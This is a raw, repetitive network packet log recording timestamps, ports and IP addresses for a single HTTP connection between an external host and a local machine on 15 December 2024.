                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.710993052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.711061001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.711707115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.711818933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.711899996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.712620974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.712672949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.712730885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.713412046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.713514090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.713591099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.714226961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.714332104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.714399099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.715042114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.715142965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.715209007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.715861082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.726205111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.726231098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.726274967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.726442099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.726490974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.726543903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.727448940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.727505922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.727536917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.728128910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.728207111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.729672909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.729799986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.729859114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.730129957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.730240107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.730321884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.730777025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.730829954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.730916977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.731534958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.731667042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.731738091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.732727051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.732814074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.732872009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.733608007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.733701944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.733752966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.734394073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.734420061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.734483957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.873192072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.873234987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.873352051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.873492002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.873651028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.873703957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.874329090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.874670029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.874721050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.874764919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.875500917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.875560999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.875564098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.876323938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.876476049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.876554966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.877115965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.877182007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.877217054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.877979040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.878040075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.878114939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.878880024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.878952026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.878997087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.879630089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.879733086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.879753113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.880481005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.880539894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.880625010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.881314039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.881375074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.881395102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.882217884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.882277966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.882334948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.882982969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.883091927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.883207083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.883825064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.883912086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.884026051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.884661913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.884776115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.884846926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.885462999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.885530949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.885581017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.886308908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.886360884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.886400938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.887175083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.887234926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.887303114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.887948036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.888000965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.888065100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.888864040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.888936043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.888946056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.889636993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.889717102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.889741898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.890508890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.890573978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.890585899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.891308069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.891401052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.891472101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.892167091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.892247915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.892282963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.893119097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.893167019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.893182993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.893825054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.893886089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.893933058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.894633055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.894690990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.894938946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.895766020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.895868063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.895898104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.896476030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.896528006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.896570921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.897161007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.897223949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.897257090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.897974014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.898026943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.898097992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.898849964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.898914099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.898938894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.899640083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.899698019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.899760008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.900486946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.900546074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.900585890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.901320934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.901410103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.901413918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.902173042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.902235031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.902277946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.903085947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.903148890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.903157949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.903853893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.903914928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.903918028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.904654026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.904710054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.904748917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.905488014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.905544043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.905580997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.906339884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.906395912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.906464100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.907259941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.907322884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.907450914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.908060074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.908114910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.908184052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.918571949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.918596029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.918695927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.918864965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.918912888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.919043064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.919725895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.919780016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.919806004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.920517921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.920595884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.921994925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.922118902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.922179937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.922420979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.922509909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.922565937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.923098087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.923222065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.923283100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.923939943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.924005985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.924069881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.924751043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.924891949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.925328016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.925612926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.925719023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.925771952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.926404953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.926492929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.926547050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.065848112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.065885067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.066016912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.066148996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.066190004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.066266060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.066824913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.066951036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.067698002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.067768097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.067780018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.067816019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.068492889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.068695068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.068804979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.069330931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.069485903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.069555044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.070420980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.070503950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.070590973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.071238995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.071289062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.071353912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.071847916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.071928024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.071993113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.072685003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.072772026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.072989941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.073709011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.073940992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.074028015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.074788094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.074817896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.074904919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.075382948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.075437069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.075500965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.076071978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.076195955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.076258898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.076870918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.076986074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.077049017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.077687025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.077816010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.077879906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.078505039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.078615904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.078676939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.079350948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.079413891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.079518080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.080234051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.080326080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.080380917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.081022024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.081177950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.081233025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.081835032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.081973076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.082032919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.082695007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.082817078 CET8049709185.81.68.147192.168.2.8
